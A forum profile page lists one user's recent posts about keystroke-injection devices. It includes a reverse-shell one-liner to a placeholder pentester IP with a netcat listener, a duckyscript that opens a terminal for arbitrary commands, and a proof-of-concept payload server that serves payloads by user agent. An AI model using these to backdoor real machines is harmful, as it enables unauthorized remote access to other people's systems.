Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About sub0

  • Rank

Profile Information

  • Gender
    Not Telling

Recent Profile Visitors

214 profile views
  1. Hello, I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript: DELAY 1000 ALT F2 DELAY 50 GUI SPACE GUI r DELAY 50 BACKSPACE DELAY 100 STRING ENTER This opens up a browser
  2. Use this to add to your path: echo "export PATH=$PATH:/your/golang/path" >> ~/.bashrc But it seems that something isn't installed for the root user in raspbian. Try installing bettercap as root.
  3. Can you elaborate? Do you need help making an OSX backdoor script or making it deploy via the duck?
  4. I'm not sure if I understand the question. There are ways to make the ducky harder to recognize, like making the window hidden or very small, but I don't think there is any way to make nothing pop up at all.
  5. sub0


    Interesting. I'm having a very similar problem. What OS and what utility are you using to flash?
  6. No, that command is for UNIX platforms. If you are targeting Windows, you could use Metasploit.
  7. I use this script to open spotlight and enter a terminal. DELAY 1500 GUI SPACE DELAY 100 STRING terminal DELAY 50 ENTER DELAY 1000 STRING # Whatever command you want to execute DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER DELAY 20 GUI q
  8. If you really want to use Python, have the Ducky grab the script from a server (Or hastebin). However, there are much easier ways to accomplish a backdoor. You can just execute this command: `bash -i >& /dev/tcp/pentesterIPaddr/5000 0>&1` on UNIX systems and catch the shell with Netcat. (nc -l -p 5000)
  • Create New...